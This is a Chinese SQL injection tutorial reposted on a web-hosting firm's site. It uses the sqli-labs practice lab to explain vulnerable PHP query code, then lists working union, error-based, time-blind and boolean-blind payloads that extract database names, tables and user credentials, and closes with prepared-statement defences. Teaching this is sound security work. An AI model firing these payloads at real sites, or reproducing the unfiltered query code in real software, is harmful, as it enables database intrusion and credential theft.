重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
这篇文章主要讲解了“SQL注入漏洞的原理”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“SQL注入漏洞的原理”吧!
创新互联建站服务项目包括北川羌族网站建设、北川羌族网站制作、北川羌族网页制作以及北川羌族网络营销策划等。多年来,我们专注于互联网行业,利用自身积累的技术优势、行业经验、深度合作伙伴关系等,向广大中小型企业、政府机构等提供互联网行业的解决方案,北川羌族网站推广取得了明显的社会效益与经济效益。目前,我们服务的客户以成都为中心已经辐射到北川羌族省份的部分城市,未来相信会继续扩大服务区域并继续获得客户的支持与信任!
用户提交数据后,后端服务器将用户提交的数据带入sql语句对数据库进行操作,如果没有进行过滤,那么用户提交构造好的特殊语句,就可以对数据库进行非法的操作,即引发sql注入,例如以下代码(sqli-labs-1)
//GET方式获取name为id的值赋值给$id变量; $id=$_GET['id']; //定义$sql变量,值为下一步要执行的sql语句,将$id变量带入sql语句中; $sql="SELECT * FROM user WHERE id='$id' LIMIT 0,1"; //将上一步定义的$sql变量的值作为sql语句带入数据库查询,并将结果赋值给$result变量,MySQL_query为php提供的数据库查询函数; $result=mysql_query($sql); //从上一步查询的结果集中去的一行作为数组返回并赋值给$row变量; $row = mysql_fetch_array($result); //如果$row值不为空,即数据库查询数据正常,则打印出username和password的值; if($row) { echo 'Your Login name:'. $row['username']; echo "
"; echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; print_r(mysql_error()); echo ""; } }
数据库中有数据如下
那么用户提交?id=-1,则代入数据库正常查询且正常输出
但如果用户提交的数据为
?id=-1' union select 1,2,database() --+
那么则会返回我们构造的语句对数据库进行的查询操作返回的值
我们将两个提交的数据都带入我们后端的执行中对比,如下
原始语句:SELECT * FROM user WHERE id='$id' LIMIT 0,1 正常带入数据:SELECT * FROM user WHERE id='1' LIMIT 0,1 非法带入数据:SELECT * FROM user WHERE id='-1' union select 1,2,database() --+' LIMIT 0,1 --(注:在执行sql语句时,“--”是sql语句中的注释符,但是使用时--后要有一个空格才能起到注释作用,否则会报错,这里的+号经过处理后会变成空格,用来和后面的单引号分隔开,才能将后面的语句注释。)
可以看到,如果没有经过过滤就将用户提交的非法数据带入后端执行的话,真正执行的语句是SELECT * FROM user WHERE id='-1' union select 1,2,database() -- ' LIMIT 0,1
,而后面被注释的部分不执行,那么就不会引发错误,在查询id字段值为-1没有结果后,就会执行union查询,查询出数据库名并输出,这就是最典型的sql注入。
就不按照数字型字符型这些来分类了,我认为按照利用方式来分类更容易理解
有回显
Union query #联合查询注入,通过union联合查询获取查询结果 Error based #报错注入,通过报错信息获取查询结果
无回显
Boolean based blind #布尔盲注,通过应用返回不同的值判断条件真假 Time based blind #时间盲注,通过不同的时间延迟推断条件真假
提交的参数与数据库交互,参数添加“ ' ”(英文单引号),出现异常(sql语法错误),即存在sql注入,如果无回显,可以通过延时或者布尔盲注来检测是否存在漏洞。
注:异常报错的原因是因为后台将参数中的单引号带入sql语句进行数据库操作,多了一个单引号引发sql语法错误,所以报错即整明了我们的单引号进入了sql语句执行中。
使用sqlmap进行检测,这里是下载地址和使用说明点击跳转
有回显型构造语句查询数据,无回显型进行盲注,不过比较费时间。
这里就以mysql的数据库,sqli-labs的less-1为例,列出一些常用的语句,如果要详细展开细讲的话,篇幅肯定会特别特别长,一篇文章恐怕各位看官们也看不下去,各位需要用到更多的语句时自行百度即可,如果需要的话后面可以分开出详细的各中注入方式的详解文章。
爆列数:?id=-1' order by n--+(“n”到几不报错则有n-1列) 爆库名:?id=-1' union select 1,2,database() --+ 爆表明:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆列名:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 爆数据:?id=-1' union select 1,group_concat(username),group_concat(password) from users --+ 注:使用中根据实际需要修改字段数(列数)以及库名表名等,union查询的字段数需要和表中的字段数相同才可以
爆库名:?id=-1’ union select count(*),count(*),concat(‘~’,(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+ 爆表名:?id=-1' union select count(*),count(*), concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a--+ 爆列名:?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a--+ 爆数据:?id=-1' union select count(*),1, concat('~',(select concat_ws(':',username,password) from users limit 1,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a--+
爆库长:?id=1' and if(length(database())=8,sleep(5),NULL)--+ 爆库名:?id=1' and if(left(database(),1)='s',sleep(5),NULL)--+ 爆表名:?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),NULL)--+ 爆列明:?id=1' and if(left((select column_name from information_schema.columns where table_name = 'users' limit 1,1),8)='username',sleep(5),NULL)--+ 爆数据:?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb',sleep(5),NULL)--+ ?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb',sleep(5),NULL)--+
爆库名:?id=1' and left((select database()),1)='s'--+ 爆表名:?id=1' and left((select table_name from information_schema.tables where table_schema ='security' limit 3,1),5)='users'--+ 爆列明:?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='username'--+ 爆数据:?id=1' and left((select username from users order by id limit 0,1),4)='dumb'--+
无回显的还有一种利用方式是利用DNSlog外带查询的内容,这里有一位师傅讲的已经很详细了,点击查看原文
以上为GET型注入,POST型类似,修改参数值即可。
依旧是sqlmap一把梭,实战中根据实际需求使用tamper进行绕过一些过滤。
用户可控的参数与数据库有交互的地方,常见与查询,登录等;
在测试中可以爬取网站的一些api查询接口,也会存在sql注入。
为网站添加waf,虽然不能修复sql注入漏洞,但是可以拦截敏感数据以防止sql注入被黑客利用
在服务器端添加过滤代码以过滤可能引发sql注入的敏感字符
示例:
prepare baizesec from 'select username,password from users where id=?'; 定义预编译语句 set @a=1; 传参数 execute baizesec using @a; 调用
感谢各位的阅读,以上就是“SQL注入漏洞的原理”的内容了,经过本文的学习后,相信大家对SQL注入漏洞的原理这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是创新互联,小编将为大家推送更多相关知识点的文章,欢迎关注!